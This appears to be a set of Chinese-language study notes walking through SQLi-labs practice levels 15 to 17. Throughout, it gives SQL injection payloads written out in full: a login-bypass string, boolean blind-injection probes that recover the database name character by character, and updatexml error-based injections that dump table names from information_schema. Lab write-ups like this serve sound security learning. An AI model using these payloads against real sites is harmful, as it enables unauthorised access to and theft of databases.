SQLi-labs-Master less-15~17less-15 用之前的方法'or 1=1 -- ad,判断为单引

less-15

用之前的方法'or 1=1 -- ad,判断为单引号order by 2正常，字段为2，正常页面

爆库名,不管用union select,还是Updatexml,都没有回显

这时候就要用盲注的方法，判断库名长度'or (length(database()))=8 -- 1,成功判断库名逐个字符ascii值'or (ascii(substr(database(),1,1)))=115 -- 1

后续操作参照less-8

less-16

同15，闭合问题，")

less-17

17关黄字提示，密码重置，尝试username判断注入点报错，在password栏判断

order by 1报错尝试updatexml报错 'and updatexml(1,concat("!",(select database()),"!"),1) -- 1，爆库爆表，'and updatexml(1,concat("!",(select table_name from information_schema.tables where table_schema='security' limit 0,1),"!"),1) -- 1 后续参考less13